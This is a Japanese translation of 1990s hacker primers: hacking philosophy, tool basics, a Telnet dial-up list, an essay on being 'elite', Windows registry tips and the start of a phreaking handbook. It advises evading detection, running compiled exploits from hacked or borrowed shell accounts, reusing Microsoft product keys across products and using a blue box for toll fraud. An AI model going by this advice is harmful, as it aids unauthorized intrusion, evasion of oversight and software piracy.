_CONTENTS_ 1 ~Hacking~ 1a. Introduction 1b. Explaination 1c. Ethics 1d. Procedure 1e. Web Links 1f. Definition 1g. Telnet Dailups 2. ~What It Means To Be Elite~ 3. ~Expoits~ 4. ~Credits~ 5. ~ShoutoutZ~ 【1a. Introduction】 もしアナタがハッカーになりたいのであれば、自分で習い、自身に問いかけ、興 味を持ちはじめる事がスタートである。仮に「どうやってハックをするんですか?」 という質問を問い掛けた時、答えが得られないのが殆どだろう。わずか一日なんか でハッキングを学べるわけないし、今でも一部の連中は自らをハッカーと公言し 、実際はコンピューターを初日に触ったと同じ知識しか持っていない。ハッキン グとは沢山の知識を一度に収集した物である。時間と忍耐力をかけ、時には独学 で学ばないで他人と協力する。こうする事によって自らのペースで学べるし、先 に行く前に確かめる事も出来るのである。まぁハッキングの知識を探してこのテ キストにたどり着いたという事で、私はそれらを提供はする。このテキストはア ナタをハッカーにさせるのではない。知識向上の為だ。 【1b. Explanation】 ハッキングとは何時間も椅子の上に座り、プログラムを行う事である。もしアナタ がプログラムを作成している場合、これはハッキングと解釈していいだろう。仮に あるプログラム上でバグを見つけた、もしくはそのバクを回避される方法を見つけ た場合、それらも同じくハッキングと解釈される。ハッキングにはそれぞれ違うク ラスに区別される。【ハッキングとはテクノロジー向上と自由の為に自発心を以っ て行う行為】意味として、全ての情報は公共に公開するべきで、隠蔽するべきでは ないとうことである。ハッキングとは、全てのクラック、Codos、そしてオペレーシ ョン等に興味を持ち、知って事で自分が満足出来るが為にそれらを追求することで ある。 もしコンピューター言語を理解出来るのであれば、かなり役に立つので勉強 する事も勧める。しかしプログラミングが出来るからと言っても、ハッキングとは メール爆弾やシステムにダメージを犯す、ウイルス感染ではな。最近メディア上で は違う意味に取られているが、実際の意味、ハッカーとは「知識追求者」なのである。 だからハッカーという呼称に誇りを持ち、ベストを尽くしてやり続けるのだ・・・・・ システムをハックするにあたって、アナタが使っているシステムが何かを知る 必要がある。そして勿論他の事も知るべきである。 【1c. Hackers Ethics(ハッカー倫理)】 1. 意図的にシステムに損害を与えてはいけない。 2. 今後のアクセスおよび感知機能からしっかり逃げられる事が確かな時 以外、自分が欲しいファイル以外は他のファイルの内容を変えてはい けない。 3. 本名、ハンドル名、電話番号等をシステム内に残してはいけない。 相手はハンドルだけでも部外者を見つけ出すこともある。 4. 他との情報交換は十分気を付けること。FED(政府機関)がトリックを使 ってくることもある。大抵相手の電話での声、名前、職業、それとも情報 交換以外に声を通して会話した事のない人物なら十分気を付けてること。 5. 知らない相手に対して電話番号等を残してはいけない。これは 相手に接続する時などである。k-radがどのような人格の人物でもである。 もしシスオペを知らないのなら、ある非常識な人物が侵害を行うと とう趣旨のメッセージでも残しておく。 6. 政府機関は絶対にハックしてはいけない。管理の行き届いていない政府機関 のシステムも当然存在する。しかし相手は普通の企業のように収益と出費を 第一に考えるのとは違い、膨大な時間と情報を駆使追いかけてきますので、 捕まる可能性は高い。 7. codesは、他に方法が無い以外使わない事。もし必要以上にcodesを使った 場合は捕まるだろう。ピリオドだ。 Hacker Ethic(ハッカー倫理) Steven Levy著、「Hacker Ethic」【_HACKERS; Heros of the Computer Revolution_】、という本はこれらを最初に収集された書籍だろう。その倫理と は次のようである。 *コンピューターのアクセス(その他この世界に関して何かを教えてくれる所) は無制限であり、自由である。Always yield to the Hands-On-Imperative! *全ての情報はフリーにすべきである。 *Mistrust authority- promote de-centralization. *ハッカーは個々のハッキングによって判断されるべきである。学位、年齢、 人種、地位といった標準で決めるべきではない。 *美と芸術をコンピューターから創作出来るのである。 *コンピューターは人生をもっと向上させてくれる。 【1d. Procedure-(方法)】 始めに用意すべき物として: コンピューター Port Scanner War Dailer インターネットアクセス機能 Telnet A Unix/Linux based OS 種類別のOS関連書籍 ネットワークに関するドキュメント(文章) 【コンピューター】ハッカーが所持出来る道具で最も重要な物 【Port Scanner】Port Scannerとは、ようするに名前通りの事をやってくれる 道具、クライアントの異なったPortを調べ、Portのリストを 作ってくれる。 【War Dailer】予め決めた番号内で電話をかけてくれる 【Internet Access】Inter"net"は膨大な数のコンピューターとネットワークを 繋げた巨大なネットワークである。 【Telnet】これはユーザーに対してホストがリモートアクセスを認可してくれ る機能である。 ======================================================================= 上記の情報は【ハッカー】というタイトルと知識を探求するにあたって大いに 役立ってくれるだろう。そしてこれと他にBASIC、アセンブラー、C++、Perlと いったプログラミング言語も知っとくべきである。ハッキングにおいてプログラ ミングにおいて重要な部分でもある。メール爆弾、nuke等を使用している連中は、 それがハッキングだと勘違いしている。この場合だと、プログラム事体はハッキ ングではない。しかしその背景にあるプログラミングがハッキングなのである。 ハッカーになりたいのであればまず、他人に頼らず、自らの知識と好奇心に頼る 事を理解する必要がある。メール爆弾や、自動ハッキングソフトみたいな物を 使っても結局は自分が墓穴を掘るだけである。 もしプログラムを作成出来る能力を持っているのであれば、それはハッキング に対して大いに役立つ。 ======================================================================= ハッカー達にとって最も腹立つ質問:「ハックを教えて」 この質問はするな。IRC内でこの質問を受けなくて一日が終わった事など今まで 無かった。彼等はハックの仕方や個人的先生等を求め、そしていずれは「ハッ キングの舞台」に導いてくれることを願ってIRCのハッキングチャンネル等に接 続してくる。私にとってハッキングとは一つの人生の「言葉」であり、心の中 での「言葉」でもある。自分以外、自らをハッカーと真から呼べる人などいない。 時間をかけてチャンネルに接続して「ハックを教えて」と質問する前に、何故 ドキュメントを読むとか、ネットを検索するとか、ネットワークやコンピュー ターに関する本を読まないのだろうか。自らが出来る限り読む事が必要なので ある。 ======================================================================= *-whois-*, *-nslookup-*, *-ping-*, *-finger*, *-traceroute-* 【whois】これは主に相手のドメイン名を検索する時などに使われる。しかしそ れ以外にもも、サーバーの詳細等も調べる事として使われる。 Whois Gateway http://www.htl-bw.ch/cgi-bin/whois さらに http://rs.internic.net/cgi-bin/whois 【nslookup】これはIPからドメイン名を検索するものである。 【ping】これは決めたパケットとそのバイト数が、どれだけの時間をかけて相手 の自分のサーバー(クライアント)から相手のサーバーに届くかを調べ てくれる。 【Finger】もしあるアカウントがFinger可能なのであれば、この機能を使う事に よって特定のアカウントの詳細を得る事が出来る。アカウントによっ て得られる情報は異なるが、主にそのアカウントを所持している個人 名、最後に接続した時間、電子メールのファイルや、その他の「予定」 ファイル等である。 【TraceRoute】TraceRouteコマンドはpingコマンドと同じような働きをする。し かしこれはクライアントから相手のサーバーまでのルート(道の り)を表示してくれる。 ======================================================================= 【1e. WebLinkz(リンク集)】 =========================== www.ilf.net www.hackersclub.com www.hackersclub.com/km/ www.l0pht.com www.silitoad.org http://www.ilf.net/rebnet/LRhp.html http://www.geocities.com/CapeCanaveral/3498/security.htm http://www.2600.com/ http://www.fc.net/phrack.html http://www.underground-online.com/ http://www.hackers.com/hacker101 http://defcon.org/ http://www.hackers.com/ http://www.underground.org/ 【1f. Definition】 TRUE Definition of a Hacker(ハッカーの本当の意味) ======================================================== ここ10年間で、HACKERという言語の意味はアメリカ国内のマスメディア関係に よって完全に覆されている。海外のプレスも一般的にコンピューターを通した 「犯罪」としてこの言葉を解釈している。彼等はHackerという意味を全く理解し ていない。そして残念な事に大抵のアメリカ国民はHackerという言葉を間違った 意味で理解している。 HACKER: 才能、知識知力、そして創意力を持った親愛なる人達の意味。特にコン ピューターオペレーション、ネットワーク、セキュリティー等。 下記の意味はINTERNETコンピューターネットワークによって世界的に公開されて いるテキストで書かれているハッカーの定義である。 【HACKER】 (1)システムのプログラミングを楽しみ、多くのユーザーのような最低限必要 なことだけ学ぶのでなく、自分の才能をさらに向上させる人達。 (2)プログラミングに熱狂的に取り組む人達、もしくはプログラミングを理論 的に学ぶのでなく、実際に行って楽しむ人達。 (3)HACK関連に好感を持てる人達。 (4)プログラミングを素早く行える人達。しかしHACKERが制作したプログラム 全てがHACKではでない。 (5)一定のプログラムにおいて精通な人達、もしくは仕事上頻繁に使用する人達。 (Definitions 1 to 5 are correlated, and people who fit them congregate.) (6)色々と捜しまくって情報等を発掘する人達;【password hacker】 【network hacker】注意点だが、HACKはけして犯罪として定義されてはいない。HACKER 達は社会組織における情報を変え、技術の向上を活発化させている。残念な事 に悪ふざけ目的でHackerがイタズラ連中へなる時もある。真のHACKERはけ して有害なウイルスなんて制作しない。 これは無慈悲、二流のプログラマーが 行う行為だ。有害なウイルスはHACKER倫理に対し反しているのである。 【1g. Uopdated List of Telnet Dailups(アメリカ合衆国内)】 (TELNET ダイアルアップリスト) STATE, CITY: AREA CODE: NUMBER: (州),(町):(郵便番号):(電話番号): (アラバマ州) AL, Anniston 205 236-9711 AL, Birmingham 205 328-2310 AL, Decatur 205 355-0206 AL, Dothan 205 793-5034 AL, Florence 205 767-7960 AL, Huntsville 205 539-2281 AL, Mobile 205 432-1680 AL, Montgomery 205 269-0090 AL, Tuscaloosa 205 752-1472 (アリゾナ州) AZ, Phoenix 602 254-0244 AZ, Tucson 602 747-0107 (アーカンソー州) AR, Ft.Smith 501 782-2852 AR, Little Rock 501 327-4616 (カリフォルニア州) CA, Bakersfield 805 327-8146 CA, Chico 916 894-6882 CA, Colton 714 824-9000 CA, Compton 213 516-1007 CA, Concord 415 827-3960 CA, Escondido 619 741-7756 CA, Eureka 707 444-3091 CA, Fresno 209 233-0961 CA, Garden Grove 714 898-9820 CA, Glendale 818 507-0909 CA, Hayward 415 881-1382 CA, Los Angeles 213 624-2251 CA, Marina Del Rey 213 306-2984 CA, Merced 209 383-2557 CA, Modesto 209 576-2852 CA, Montery 408 646-9092 CA, Norwalk 213 404-2237 CA, Oakland 415 836-4911 CA, Oceanside 619 430-0613 CA, Palo Alto 415 856-9995 CA, Pomona 714 626-1284 CA, Sacramento 916 448-6262 CA, Salinas 408 443-4940 CA, San Carlos 415 591-0726 CA, San Diego 619 233-0233 CA, San Francisco 415 956-5777 CA, San Jose 408 294-9119 CA, San Pedro 213 548-6141 CA, San Rafael 415 472-5360 CA, San Ramon 415 829-6705 CA, Santa Ana 714 558-7078 CA, Santa Barbara 805 682-5361 CA, Santa Cruz 408 429-6937 CA, Santa Rosa 707 656-6760 CA, Stockton 209 957-7610 CA, Thousand Oaks 805 495-3588 CA, Vallejo 415 724-4200 CA, Ventura 805 656-6760 CA, Visalia 209 627-1201 CA, West Covina 818 915-5151 CA, Woodland Hills 818 887-3160 (コロラド州) C0, Colorado 719 635-5361 CO, Denver 303 337-6060 CO, Ft. Collins 303 493-9131 CO, Grand Junction 303 241-3004 CO, Greeley 303 352-8563 CO, Pueblo 719 542-4053 (コネチカット州) CT, Bridgeport 203 335-5055 CT, Danbury 203 794-9075 CT, Hartford 203 247-9479 CT, Middletown 203 344-8217 CT, New Britain 203 225-7027 CT, New Haven 203 624-5954 CT, New London 203 447-8455 CT, Norwalk 203 866-7404 CT, Stamford 203 348-0787 CT, Waterbury 203 753-4512 (デラウエア州) DE, Dover 302 678-8328 DE, Newark 302 454-7710 (ワシントンDC) DC, Washington 202 429-7896 DC, Washington 202 429-7800 (フロリダ州) FL, Boca Raton 407 338-3701 FL, Cape Coral 813 275-7924 FL, Cocoa Beach 407 267-0800 FL, Daytona Beach 904 255-2629 FL, Ft. Lauderdale 305 764-4505 FL, Gainsville 904 338-0220 FL, Jacksonville 904 353-1818 FL, Lakeland 813 683-5461 FL, Melbourne 407 242-8247 FL, Miami 305 372-0230 FL, Naples 813 263-3033 FL, Ocala 904 351-3790 FL, Orlando 407 422-4099 FL, Pensacola 904 432-1335 FL, Pompano Beach 305 941-5445 FL, St. Petersburg 813 323-4026 FL, Sarasota 813 923-4563 FL, Tallahassee 904 681-1902 FL, Tampa 813 224-9920 FL, West Palm Beach 407 833-6691 (ジョージア州) GA, Albany 912 888-3011 GA, Athens 404 548-5590 GA, Atlanta 404 523-0834 GA, Augusta 404 724-2752 GA, Colombus 404 571-0556 GA, Macon 912 743-8844 GA, Rome 404 234-1428 GA, Savannah 912 236-2605 (ハワイ州) HI, Oahu 808 528-0200 (アイダホ州) ID, Boise 208 343-0611 ID, Idaho Falls 208 529-0406 ID, Lewiston 208 743-0099 ID, Pocatella 208 232-1764 (イリノイ州) IL, Aurora 312 896-0620 IL, Bloomington 309 827-7000 IL, Chicago 312 938-0600 IL, Decatur 217 429-0235 IL, Dekalb 815 758-2623 IL, Joliet 815 726-0070 IL, Peoria 309 637-8570 IL, Rockford 815 965-0400 IL, Springfield 217 753-1373 IL, Urbana 217 384-6428 (インディアナ州) IN, Bloomington 812 332-1344 IN, Evansville 812 424-7693 IN, Ft. Wayne 219 426-2268 IN, Gary 219 882-8800 IN, Indianapolis 317 299-0024 IN, Kokomo 317 455-2460 IN, Lafayette 317 742-6000 IN, Muncie 317 282-6418 IN, South Bend 219 233-7104 IN, Terre Haute 812 232-5329 (アイオワ州) IA, Ames 515 233-6300 IA, Cedar Rapids 319 364-0911 IA, Davenport 319 324-2445 IA, Des Moines 515 288-4403 IA, Dubuque 319 556-0783 IA, Iowa City 319 351-1421 IA, Sioux City 712 255-1545 IA, Waterloo 319 232-5441 (カンサス州) KS, Lawrence 913 843-8124 KS, Manhattan 913 537-0948 KS, Salina 913 825-7900 KS, Topeka 913 233-9880 KS, Wichita 316 262-5669 (ケンタッキー州) KY, Bowling Green 502 782-7941 KY, Frankfort 502 875-4654 KY, Lexington 606 233-0312 KY, Louisville 502 589-5580 KY, Owensboro 502 686-8107 (ルイジアナ州) LA, Alexandria 318 445-1053 LA, Baton Rouge 504 343-0753 LA, Lafayette 318 233-0002 LA, Lake Charles 318 436-0518 LA, Monroe 318 387-6330 LA, New Orleans 504 524-4094 LA, Shreveport 318 221-5833 (メイン州) ME, Augusta 207 622-3123 ME, Brewer 207 989-3081 ME, Lewiston 207 784-0105 ME, Portland 207 761-4000 (メリーランド州) MD, Annapolis 301 224-8550 MD, Baltimore 301 727-6060 MD, Frederick 301 293-9596 (マサチューセッツ州) MA, Boston 617 292-0662 MA, Brockton 508 580-0721 MA, Fall River 508 677-4477 MA, Framingham 508 879-6798 MA, Lawrence 508 975-2273 MA, Lexington 617 863-1550 MA, Lowell 508 937-5214 MA, New Bedford 508 999-2915 MA, Northampton 413 586-0510 MA, Pittsfield 413 499-7741 MA, Salem 508 744-1559 MA, Springfield 413 781-3811 MA, Woods Hole 508 540-7500 MA, Worcester 508 755-4740 (ミシガン州) MI, Ann Arbor 313 996-5995 MI, Battle Creek 616 968-0929 MI, Detroit 313 964-2988 MI, Flint 313 235-8517 MI, Grand Rapids 616 774-0966 MI, Jackson 517 782-8111 MI, Kalamazoo 616 345-3088 MI, Lansing 517 484-0062 MI, Midland 517 832-7068 MI, Muskegon 616 726-5723 MI, Pontiac 313 332-5120 MI, Port Huron 313 982-8364 MI, Saginaw 517 790-5166 MI, Southfield 313 827-4710 MI, Traverse City 616 946-2121 MI, Warren 313 575-9152 (ミネソタ州) MN, Duluth 218 722-1719 MN, Mankato 517 388-3780 MN, Minneapolis 612 341-2459 MN, Rochester 507 282-5917 MN, St. Cloud 612 253-2064 (ミシシッピ州) MS, Gulfport 601 863-0024 MS, Jackson 601 969-0036 MS, Meridian 601 482-2210 MS, Starkville 601 324-2155 (ミズリー州) MO, Columbia 314 449-4404 MO, Jefferson City 314 634-5178 MO, Kansas City 816 221-9900 MO, St. Joseph 816 279-4797 MO, St. Louis 314 421-4990 MO, Springfield 417 864-4814 (モンタナ州) MT, Billings 406 245-7649 MT, Great Falls 406 771-0067 MT, Helena 406 443-0000 MT, Missoula 406 721-5900 (ネブラスカ州) NE, Lincoln 402 475-4964 NE, Omaha 402 341-7733 (ネバダ州) NV, Las Vegas 702 737-6861 NV, Reno 702 827-6900 (ニューハンプシャー州) NH, Concord 603 224-1024 NH, Durham 603 868-2924 NH, Manchester 603 627-8725 NH, Nashua 603 880-6241 NH, Portsmouth 603 431-2302 (ニュージャージー州) NJ, Atlantic City 609 348-0561 NJ, Freehold 201 780-5030 NJ, Hackensack 201 488-6567 NJ, Marlton 609 596-1500 NJ, Merchantville 609 663-9297 NJ, Morristown 201 455-0275 NJ, New Brunswick 201 745-2900 NJ, Newark 201 623-0469 NJ, Passaic 201 778-5600 NJ, Paterson 201 684-7560 NJ, Princeton 609 799-5587 NJ, Rahway 201 815-1885 NJ, Redbank 201 571-0003 NJ, Roseland 201 227-5277 NJ, Sayreville 201 525-9507 NJ, Trenton 609 989-8847 (ニューメキシコ州) NM, Albuquerque 505 243-4479 NM, Las Cruces 505 526-9191 NM, Santa Fe 505 473-3403 (ニューヨーク州) NY, Albany 518 465-8444 NY, Binghampton 607 772-6642 NY, Buffalo 716 847-1440 NY, Dear Park 516 667-5566 NY, Hempstead 516 292-3800 NY, Ithaca 607 277-2142 NY, New York City 212 741-8100 NY, New York City 212 620-6000 NY, Plattsburgh 518 562-1890 NY, Poughkeepsie 914 473-2240 NY, Rochester 716 454-1020 NY, Syracuse 315 472-5583 NY, Utica 315 797-0920 NY, White Plains 914 328-9199 (ノースカロライナ州) NC, Asheville 704 252-9134 NC, Charlotte 704 332-3131 NC, Fayetteville 919 323-8165 NC, Gastonia 704 865-4708 NC, Greensboro 919 273-2851 NC, High Point 919 889-7494 NC, North Wilkesboro 919 838-9034 NC, Raleigh 919 834-8254 NC, Res Tri Park 919 549-8139 NC, Tarboro 919 823-0579 NC, Wilmington 919 763-8313 NC, Winston-Salem 919 725-2126 (ノースダコタ州) ND, Fargo 701 235-7717 ND, Grand Forks 701 775-7813 ND, Mandan 701 663-2256 (オハイオ州) OH, Canton 216 452-0903 OH, Cincinnati 513 579-0390 OH, Cleveland 216 575-1658 OH, Colombus 614 463-9340 OH, Dayton 513 461-5254 OH, Elyria 216 323-5059 OH, Hamilton 513 863-4116 OH, Kent 216 678-5115 OH, Lorain 216 960-1170 OH, Mansfield 419 526-0686 OH, Sandusky 419 627-0050 OH, Springfield 513 324-1520 OH, Toledo 419 255-7881 OH, Warren 216 394-0041 OH, Wooster 216 264-8920 OH, Youngstown 216 743-1296 (オクラホマ州) OK, Bartlesville 918 336-3675 OK, Lawton 405 353-0333 OK, Oklahoma City 405 232-4546 OK, Stillwater 405 624-1113 OK, Tulsa 918 584-3247 (オレゴン州) OR, Corvallis 503 754-9273 OR, Eugena 503 683-1460 OR, Hood River 503 386-4405 OR, Klamath Falls 503 882-6282 OR, Medford 503 779-6343 OR, Portland 503 295-3028 OR, Salem 503 378-7712 (ペンシルベニア州) PA, Allentown 215 435-3330 PA, Altoona 814 949-0310 PA, Carlisle 717 249-9311 PA, Danville 717 271-0102 PA, Erie 814 899-2241 PA, Harrisburg 717 236-6882 PA, Johnstown 814 535-7576 PA, King Of Prussia 215 337-4300 PA, Lancaster 717 295-5405 PA, Philadelphia 215 574-9462 PA, Pittsburgh 412 288-9950 PA, Reading 215 376-8750 PA, Scranton 717 961-5321 PA, State College 814 231-1510 PA, Wilkes-Barre 717 829-3108 PA, Williamsport 717 494-1796 PA, York 717 846-6550 (ロードアイランド州) RI, Providence 401 751-7910 (サウスカロライナ州) SC, Charleston 803 722-4303 SC, Columbia 803 254-0695 SC, Greenville 803 233-3486 SC, Spartenburg 803 585-1637 SC, Pierre 605 224-0481 SC, Rapid City 605 348-2621 SC, Sioux Falls 605 336-8593 (テネシー州) TN, Bristol 615 968-1130 TN, Chattanooga 615 756-1161 TN, Clarksville 615 552-0032 TN, Johnson City 615 282-6645 TN, Knoxville 615 525-5500 TN, Memphis 901 521-0215 TN, Nashville 615 244-3702 TN, Oak Ridge 615 481-3590 (テキサス州) TX, Abilene 915 676-9151 TX, Amarillo 806 373-0458 TX, Athens 214 677-1712 TX, Austin 512 928-1130 TX, Brownsville 512 542-0367 TX, Bryan 409 822-0159 TX, Corpus Christi 512 884-9030 TX, Dallas 214 748-6371 TX, El Paso 915 532-7907 TX, Ft. Worth 817 332-4307 TX, Galveston 409 762-4382 TX, Houston 713 227-1018 TX, Laredo 512 724-1791 TX, Longview 214 236-4205 TX, Lubbock 806 747-4121 TX, Mcallen 512 686-5360 TX, Midland 915 561-9811 TX, Nederland 409 722-3720 TX, San Angelo 915 944-7612 TX, San Antonio 512 225-8004 TX, Sherman 214 893-4995 TX, Temple 817 773-9723 TX, Tyler 214 597-8925 TX, Waco 817 752-9743 TX, Wichita Falls 817 322-3774 (ユタ州) UT, Ogden 801 627-1630 UT, Provo 801 373-0542 UT, Salt Lake City 801 359-0149 (バーモント州) VT, Burlington 802 864-0808 VT, Montpelier 802 229-4966 VT, Rutland 802 775-1676 VT, White River Jct. 802 295-7631 (バージニア州) VA, Blacksburg 703 552-9181 VA, Charlottesville 804 977-5330 VA, Covington 703 962-2217 VA, Fredericksburg 703 371-0188 VA, Harrisonburg 703 434-7121 VA, Herndon 703 435-1800 VA, Lynchburg 804 845-0010 VA, Newport News 804 596-6600 VA, Norfolk 804 625-1186 VA, Richmond 804 788-9902 VA, Roanoke 703 344-2036 (ワシントン州) WA, Auburn 206 939-9982 WA, Bellingham 206 733-2720 WA, Everett 206 775-9929 WA, Longview 206 577-5835 WA, Olympia 206 754-0460 WA, Richland 509 943-0649 WA, Seattle 206 625-9612 WA, Spokane 509 455-4071 WA, Tacoma 206 627-1791 WA, Vancouver 206 693-6914 WA, Wenatchee 509 663-6227 WA, Yakima 509 575-1060 (ウエストバージニア州) WV, Charleston 304 343-6471 WV, Huntington 304 523-2802 WV, Morgantown 304 292-0104 WV, Wheeling 304 233-7732 (ウイスコンシン州) WI, Beloit 608 362-5287 WI, Eau Claire 715 836-9295 WI, Green Bay 414 432-2815 WI, Kenosha 414 552-9242 WI, La Crosse 608 784-0560 WI, Madison 608 257-5010 WI, Milwaukee 414 271-3914 WI, Neenah 414 722-7636 WI, Racine 414 632-6166 WI, Sheboygan 414 452-3995 WI, Wausau 715 845-9584 WI, West Bend 414 334-2206 (ワイオミング州) WY, Casper 307 265-5167 WY, Cheyenne 307 638-4421 WY, Laramie 307 721-5878 (第二部へ続く) (第2部) ======================================================================= 2 ~What is means to be Elite?~ (エリートなHACKERになるとは?) **イントロダクション** ----------------------------------------------------------------------- 私自身、IRCやチャット等で、あまりの沢山の人達からの同じ質問に驚いている。 「アナタはエリートなんですか?」それか「エリートになるにはどうしたらいい のですか?」。私はこれらの質問をされると幾つか理由から、極端に無性に腹立 つ。このテキストの目的とは、これらの質問を答えるのと、無駄な時間の減少で ある。一部シンプルでフェアな答えも存在する。そして私はそれらをここで説明 するつもりである。私は出来る限り明確に説明するつもりだが、仮に質問があっ てもメールなどは送らないように。しかしここで物覚えの悪い連中の為に、 nrage@hackersclub.comで私とコンタクト可能だ。 **必要事項** ----------------------------------------------------------------------- ではここからがこのテキストにおいて最も大事な部分である。このセクションで は、上で述べたように幾つかの質問に対する答えを提供する。 アナタは今までに「エリートですか?」と尋ねられた事があるか?まぁこのテキ ストででエリートになるという事がどういう意味か理解していただける事を願う。 「エリートネス(秀才)」とは、地位の事である。ハッキング社会においてエリ ートになるということは(それか少なくても賞される)、(以下文章削除)。し かしそれは一晩、それか1週間、いや、一ヶ月の期間で成れる事ではない。膨大 な時間と、何年もの学習と閃きからエリートになれるのである。 そしてもしアナタがある日「よし、俺にとってやっと全てが揃ったぜ!!これで なんでも出来る。みんなみたいにハックが出来るぜっ!」と思ったら、それは事 実でもあればそうでない時もある。しかし仮に本当なら、それを自慢するな!精 通されたハッカーだからと言って、必ずしもそれが貧弱ではないとは限らないの である。世界でも最も優れたハッカーになれるかもしれない。しかしそれでも貧 弱な態度を変えない連中も沢山いる。(例えばある晩のIRC等で他人から指摘され た時)。みんなに対しどれだけ素晴らしいかを言うポイントなどあまりない。アナ タは誰をびっくりさせようとしているのだ? ここで浮上する質問は分かってる。「この私はエリートか?」。個人的に自分の 事をそうだとは思わない。今でもやるべき膨大な数の勉強が残っている。しかし だからといって私が無知な人間だというわけでもない。私は人から称号されるこ とは好きではない。実際著名なHackerや有名なHackerに聞いてみると分かると思 うが、彼等はどれだけ人より出来ても自らをエリートとは称さない。誰がエリー トかなど自身が決める事なのだ。そして他からエリートと認められる時は、 Hacking社会全体から認めらる時である。 さぁこれで既に2つも質問に答えた。では3番目の質問に移ろう。 --- How do I use a exploit? --- 99%の確立でexploitはC言語でコードされている事から、まず使うboxへのshell か、それともHACKを試みる相手と同じOSを起動される必要がある。その為基本的 にソースコードかバイナリコードをお前のSHELLアカウントのディレクトリに入れ る必要がある。(HACKして得たアカウントか、他人のアカウントを使った方がい い)SHELLに入れる方法としえFTPからアップロードするか、もしお前がダイアル アップSHELLを使っているならrzを使用する。どちらの方法にしても説明する必要 があるのでここで説明する。これは結構簡単である。 まずexploitを手に入れたらそれをコンパイルする必要がある。普通下記のよう な方法でコンパイルが可能である。 blah:~/$gcc exploit.c これでexploitがコンパイルされる。しかしここで覚えていてもらいたいのは、 一部のexploit codeerはかなり厄介で、Cを知らない連中を混乱に陥れる。そし て場合によってはバグなんかをexploitに入れることもある。 コンパイルが終了後、exploitを起動させ、ROOT PROMPTを見ることによってそ の作業が終わらせる。しかし全てのexploitが同じだとは限らない、場合によっ ては違うコマンドを使って起動される必要がある。 --- Where can I get some exploits? --- exploits入手で私が見つけた2つのベストな場所を紹介する。 http://get.your.exploits.com(←現在閉鎖) http://www.rootshell.com 両方ともexploits情報や、その他の情報にはもってこいの場所である。 -Miah (Legions Of the Underground) 4. ~クレジット~ Hacking section- Optiklenz Exploits By -Miah What It Means To Be Elite by- NegativeRage Hackerz Definition written by- Crash Lewis 5 ~ShoutOutZ~ Greetz to everyone and anyone who has ever helped the Hacking scence. Enter the Underground http://www.hackersclub.com/lou/ Windows 95の名前を変える お前のPCはWindows 95がプリインストールされていたかい? 登録した時に、その名前が"OEMUser"とか、それ以外のつまらない名前になって るって、メチャダサイだろう。それともいつかWindows 95を再インストールした 時、本名を入れるかい? どっちにしたってこれは変えるべきだ。以下がその方法である。 1)レジストリのバックアップを取る。我々は本気だ。 2)regeditを起動させる。「スタート」→「ファイル名を指定して実行」に行ってregedit と打ち込み、エンターを押す。 3)HKEY_LOCAL_MACHINEからSoftware/Microsoft/Windows/CurrentVersionに行く。 4)RegisteredOrganizationとRegisteredOwnerに行き、自分の好きな言葉を入れる。 5)これで終わりである。コンピューターを再起動させる。 アナタが他のソフトウエアのレジストリ情報を変えたいのであれば、Softwareキーから 変更出来る。だが一度に1つだけ変更するように。そして必ずレジストリのバックアップを 取ること!! \\//Translated by plutur\\// //\\ plutur@hotmail.com //\\ Keyを見つける方法 一度がコンピューターが壊れると、Windows 95をインストールする際に登録する キーが消えてしまうと思っているだろう。(それかOffice、Plus pack、Publisher、 それか他のマイクロフト製品のキー)でもアナタは部屋のコルクボードにでもそ の番号が書かれた紙を貼り付けているからとりあえず大丈夫である。だが毎回マ イクロソフトの製品をインストールする際、こんなイライラさせる様なCD Keyを 入れないと再インストール出来ないのだろうか。そして毎回壊れるたびにそのキー もコンピューターから消えてしまうのだろうか。 いや、実はこれが消えていないのである。アナタが前にインストールしたソフトウ エアのCD Keyがレジストリにそのまま保管されているのだ。下記がそれを探す方法だ。 1)レジストリのバックアップを取る。 2)レジストリを起動、「スタート」から「ファイル名を指定して実行」に行き、regedit と入力してエンターを押す 3)HKEY_LOCAL_MACHINEの欄で、Softwareに行く 4)Microsoftのリストに行って自分が再インストールしたいソフトウエアのディレクトリ を見つける。 5)ProductIDをダブルクリック。そして真ん中の2つの番号を見る。 (例53491-460-1656111-49145なら 460-1656111) 6)Ctrl-CでCD Keyをコピーする。これで終了。 ** NOTE ** 大抵のマイクソフトのキーは異なるソフトウエアアプリケーションで使用可能である。 例: Win95のキーはMicrosoft Office 95、Plus Pack、NT等で使用出来る。 \\//Translated by plutur\\// //\\ plutur@hotmail.com //\\ _____________________________________________________________ *********************************************************************** *********************************************************************** ************************** NEWBIES HANDBOOK *************************** ****************** HOW TO BEGIN IN THE WORLD OF H/P ******************* ************************* BY : Plowsk・ Phreak ************************* *********************************************************************** *********************************************************************** 私はこのドキュメントに掲載されている情報を教育目的以外で使用した場合に関 して一切責任を持たない。紹介されている情報の一部には犯罪的な内容も含まれ ている。各自が責任を持つこと。そしてこのドキュメントを配布する事は認める が、内容を一切変更しないという事を条件と、何処かにクレジットとして私の名 前を載せる事が条件であえる。例えば下記のように載せる。 NEWBIES HANDBOOK HOW TO BEGIN IN THE WORLD OF H/P BY : Plowsk・ Phreak Into: 私がHACKINGの世界に入った当時、NEWBIE達の為に薦められるようなテキストは 無かった。だから私自身がこれを機に書けばいいと思ったのである。しかしここ のテキストではスペルミスの単語、パンクチュエーションのミス等は気にせず書 いてあるので、仮に見つけても無視してもらいたい。そしてここでのドキュメン トでは他のドキュメントに掲載されている内容も紹介する。一度誰かにされた内 容を、何故二度も書く必要があるのだ?もしこのドキュメントを読んでいる最中、 「それでどうやってHACKをするの?」なんて言葉が脳裏に浮かんだら、ただちに このドキュメントを読むのを止めてもらいたい。何故ならどっちにしたって理解 など出来ないからである。あとHACKをするにあたって、まずシステムを理解する 必要があるということも忘れてはならない。そうすれば翌々は、自分で色々なア イディアが浮かび、それをトライをする気になって、最終的にそれが自分を進歩 させるのである。 私はこのドキュメントを出来る限り小さい容量でまとめるつもりである。このド キュメントを読んだ後、アナタはどうやってHACKするか、何故HACKを行うか、或 る程度のアイディアが浮かぶはずだ。ここで覚えてもらいたい事は、すべてのPROJECT が異なった内容なのである。その為それぞれ異なるPROJECTにも頭を十二分に使 い分けることが重要である。 Tool: HACKER/PHREAKERになる前に、いくつかの必要なToolがある。 'puter *=* COMPUTER(当たり前だ ) Terminal Software *=* Hyper Terminalみたいな物。これを使い、他のコンピュー ターにダイアルする。 Blue Box *=*(2600FAQから引用)Blue Boxとは2600HZのトーンを作り出し、in-band signallingで使用されるtelephone switcheを誤作動させる物であ る。そうすれば電話はBlue Boxが発するトーンで、長距離電話で 使われる特別電話スイッチにアクセスすることが出来るのである。 Scanner *=* 